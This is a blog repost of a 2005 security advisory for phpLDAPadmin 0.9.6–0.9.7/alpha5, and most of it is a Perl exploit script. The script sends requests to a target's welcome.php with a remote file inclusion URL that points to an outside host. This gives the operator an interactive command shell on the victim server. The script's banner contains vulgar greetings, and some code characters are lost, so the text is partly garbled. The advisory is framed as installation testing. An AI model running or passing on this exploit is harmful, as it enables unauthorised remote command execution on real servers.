ITPub博客

首页 > 应用开发 > IT综合 > phpLDAPadmin Command Execution (Exploit)

phpLDAPadmin Command Execution (Exploit)

原创 IT综合 作者:coolwinds 时间:2005-09-04 13:26:28 0 删除 编辑

Summary
"phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server."

Lack of proper parameter filtering by phpLDAPadmin allows attackers to cause the program to execute arbitrary code, the following exploit code can be used to test your installation for the mentioned vulnerability.

Credit:
The information has been provided by "Johnnie Walker" .

[@more@]

Exploit:
#!/usr/bin/perl
#__________ ____ ________
#______ ____ __| _/ ______ ____________ ____ ____ ____
# | _// __ / __ | | | _ __ __ / ___ / _ /
# | | ___// /_/ | | ` | // __ _/ /_/ > <_> ) |
# |____|_ /___ >____ | /_______ /__| (____ /___ / ____/|___| /
# / / / / //_____/ /
# Coded By Johnnie Walker
# Greets: sirh0t , Cute Eliisabeth And Tayphoon
# Suck My Dick: cobradriver , atmaca , kozan
# Red Dragon: Johhnie Walker . Nightmare . Erbil
# f0rtcu We Never f0rget You

use IO::Socket;

if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$path = $ARGV[1];
$target = $ARGV[2];

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Can't connect!rn";
while (1) {
print 'RedDrag0n@'.$host.'$ ';
$cmd = ;

if ($target == 2) {
$file = "welcome.php?custom_welcome_page=http://sinanreklam.net/banner.gif?cmd="
}
chop($cmd);
last if ($cmd eq 'exit');
print $sock "GET ".$path.$file.$cmd." HTTP/1.1rnHost: ".$host."rnConnection: Keep-Alivernrn";
$vuln=0;
while ($ans = <$sock>)
{
if ($vuln == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $vuln = 1; }
}
if ($vuln == 0) {print "Exploit Failed :(rn";exit();}
}
}
else {
print "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 Remote Command Executionrnrn";
print "Coded By Johhnie Walkerrnrn";
print "Greets To sirh0t , Cute Eliisabeth And Tayphoonrnrn";
print "Usage: perl $0 [target_nr] 2rnrn";
print "Example: perl $0 victim.com /phpldapadmin/ 2 rnrn";
exit;
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-805806/,如需转载,请注明出处,否则将追究法律责任。

下一篇: P2P Pro Command DoS
请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947472